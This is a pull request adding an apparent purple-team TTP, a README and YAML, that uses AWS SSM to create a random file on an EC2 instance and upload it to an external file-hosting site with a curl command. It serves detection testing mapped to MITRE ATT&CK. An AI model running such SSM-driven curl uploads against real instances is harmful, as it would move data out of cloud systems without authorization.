### PR TITLE
Exfil from EC2 to Internet

### DIFF
--- a/ttps/cloud/aws/ec2/exfil-from-ec2-to-internet/README.md
+++ b/ttps/cloud/aws/ec2/exfil-from-ec2-to-internet/README.md
@@ -1,0 +1,46 @@
+# Exfil from EC2 to Internet
+
+![Meta TTP](https://img.shields.io/badge/Meta_TTP-blue)
+
+This TTP is executed on your local machine.
+Using AWS SSM, commands to generate random file of a given size are sent to EC2 instance.
+Again using AWS SSM, command to exfil file to external file upload site are sent.
+The output is stored in file `/tmp/exfil_url.txt`
+
+## Arguments
+
+- **aws_region**: The AWS region the EC2 instance is in.
+- **ec2_instance_id**: The instance ID of the EC2 to exfiltrate the test file from.
+- **generated_exfil_file_path**: The name and full path of the file to be generated and located on the EC2 (Default: /tmp/purple_aws_exfil_test)
+- **exfil_file_size_bytes**: Size in bytes of the randomly generated file to create for exfiltrationl (Default: 20 MB)
+- **curl_upload_command**: Curl command to be issued to upload the exfil file.
+
+## Steps
+
+1. Set up necessary cloud environment variables
+2. Generate a file for exfiltration on the ec2 instance to be exfiltrated.
+3. Upload the generated exfil file to the internet. The URL of uploaded file can be found in `tmp/exfil_url.txt`
+
+## Manual Reproduction Steps
+
+```
+# Set necessary env variables
+
+# Login to EC2 instance over SSM
+aws ssm start-session --target "INSTANCE_ID" --region "REGION"
+
+# Generate a random file to be exfiled.
+openssl rand -out /tmp/exfil_file 1000000
+
+#Exfil the file to an external file upload site.
+curl https://bashupload.com/ -T /tmp/exfil_file -o /tmp/exfil_url.txt
+```
+
+## MITRE ATT&CK Mapping
+
+- **Tactics**:
+  - TA0010 Exfiltration
+- **Techniques**:
+  - T1048 Exfiltration Over Alternative Protocol
+- **Sub-Techniques**:
+  - T1048.3 Exfiltration Over Unencrypted Non-C2 Protocol

--- a/ttps/cloud/aws/ec2/exfil-from-ec2-to-internet/exfil-from-ec2-to-internet.yaml
+++ b/ttps/cloud/aws/ec2/exfil-from-ec2-to-internet/exfil-from-ec2-to-internet.yaml
@@ -1,0 +1,74 @@
+---
+api_version: 2.0
+uuid: 3bc07f14-f859-4bf3-b478-067d076cd3e1
+name: exfil_from_ec2_to_internet
+description: |
+  This TTP is executed on your local machine.
+  Using AWS SSM, commands to generate random file of a given size are sent to EC2 instance.
+  Again using AWS SSM, command to exfil file to external file upload site are sent.
+  The output is stored in file `/tmp/exfil_url.txt`
+
+args:
+  - name: aws_region
+    description: The AWS region the EC2 instance is in.
+  - name: ec2_instance_id
+    description: The instance ID of the EC2 to exfiltrate the test file from.
+  - name: generated_exfil_file_path
+    description: The name and full path of the file to be generated and located on the EC2.
+    default: /tmp/aws_exfil_test
+  - name: exfil_file_size_bytes
+    description: size in bytes of the randomly generated file to create for exfiltration
+    type: int
+    default: 20000000
+  - name: curl_upload_command
+    description: Curl command to be issued to upload the exfil file.
+    default: "curl https://bashupload.com/ -T"
+
+mitre:
+  tactics:
+    - TA0010 Exfiltration
+  techniques:
+    - T1048 Exfiltration Over Alternative Protocol
+  subtechniques:
+    - T1048.3 Exfiltration Over Unencrypted Non-C2 Protocol
+
+steps:
+  - name: aws-connector
+    description: This step invokes the verifies aws creds are present and aws cli is available.
+    ttp: //helpers/cloud/aws/validate-aws-env-configured.yaml
+    args:
+      region: "{{ .Args.region }}"
+
+  - name: verify_instanceID
+    description: This step invokes validates that the instance ID provided by user is valid.
+    inline: |
+      echo '***** Ensuring valid instance ID is provided. *****'
+
+      if [[ ! "{{ .Args.ec2_instance_id }}" =~ ^i-[a-fA-F0-9]{17}$ ]]; then
+        echo "Error: Invalid EC2 instance ID: {{ .Args.ec2_instance_id }}"
+        exit 1
+      fi
+
+  - name: generate_exfil_file_over_ssm
+    description: Generate a file for exfiltration on the ec2 instance to be exfiltrated.
+    inline: |
+      aws ssm send-command --region {{.Args.aws_region}} --instance-ids {{.Args.ec2_instance_id}} --document-name "AWS-RunShellScript" \
+      --parameters commands=["sudo su ubuntu && \
+      openssl rand -out {{.Args.generated_exfil_file_path}} {{.Args.exfil_file_size_bytes}}"] > /dev/null
+    cleanup:
+      inline: |
+        aws ssm send-command --region {{.Args.aws_region}} --instance-ids {{.Args.ec2_instance_id}} --document-name "AWS-RunShellScript" \
+        --parameters commands=["sudo su ubuntu && \
+        rm {{.Args.generated_exfil_file_path}}"] > /dev/null
+
+  - name: upload_exfil_file
+    description: Upload the generated exfil file to the internet. The URL of uploaded file can be found in `tmp/exfil_url.txt`
+    inline: |
+      aws ssm send-command --region {{.Args.aws_region}} --instance-ids {{.Args.ec2_instance_id}} --document-name "AWS-RunShellScript" \
+      --parameters commands=["sudo su ubuntu && \
+      {{.Args.curl_upload_command}} {{.Args.generated_exfil_file_path}} -o /tmp/exfil_url.txt && cat /tmp/exfil_url.txt"] > /dev/null
+    cleanup:
+      inline: |
+        aws ssm send-command --region {{.Args.aws_region}} --instance-ids {{.Args.ec2_instance_id}} --document-name "AWS-RunShellScript" \
+        --parameters commands=["sudo su ubuntu && \
+        rm /tmp/exfil_url.txt"] > /dev/null


### PR DESCRIPTION
Summary:
TTP to exfil data from EC2 instance to the internet.

Instance used needs to have the SSM agent installed and the IAM role attached with the necessary permissions.

Differential Revision: D59339276


